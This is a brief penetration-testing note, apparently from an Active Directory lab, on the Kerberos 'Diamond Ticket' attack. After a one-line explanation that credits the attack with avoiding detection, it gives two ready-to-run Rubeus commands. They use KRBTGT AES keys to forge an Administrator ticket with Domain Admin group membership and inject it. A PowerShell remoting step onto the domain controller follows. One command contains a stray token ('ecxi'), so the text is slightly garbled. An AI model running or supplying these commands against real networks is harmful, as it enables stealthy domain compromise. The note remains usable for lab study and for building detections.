Diamond Ticket is an attack were we ask a TGT from the KDC and then decrypt the TGT with the KRBTGT Hash then modify the Ticket and then send it back to the KDC that help in Avoiding Detection
.\\Rubeus.exe diamond /krbkey:c22697a1fae7d6d996e0b3de103c0ec403a0d39b2348c1a0d19f3ff44979e8d3 /tgtdeleg /enctype:aes /ticketuser:Administrator /domain:bank.local /dc:dc-1.bank.local /ticketuserid:500 /groups:512 ecxi /ptt
.\\Rubeus.exe diamond /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:Administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\\Windows\\System32\\cmd.exe /show /ptt
Now we have new cmd opened for us
Let’s try to PS Remote to the DC from the new CMD
Enter-PSSession -ComputerName dcorp-dc
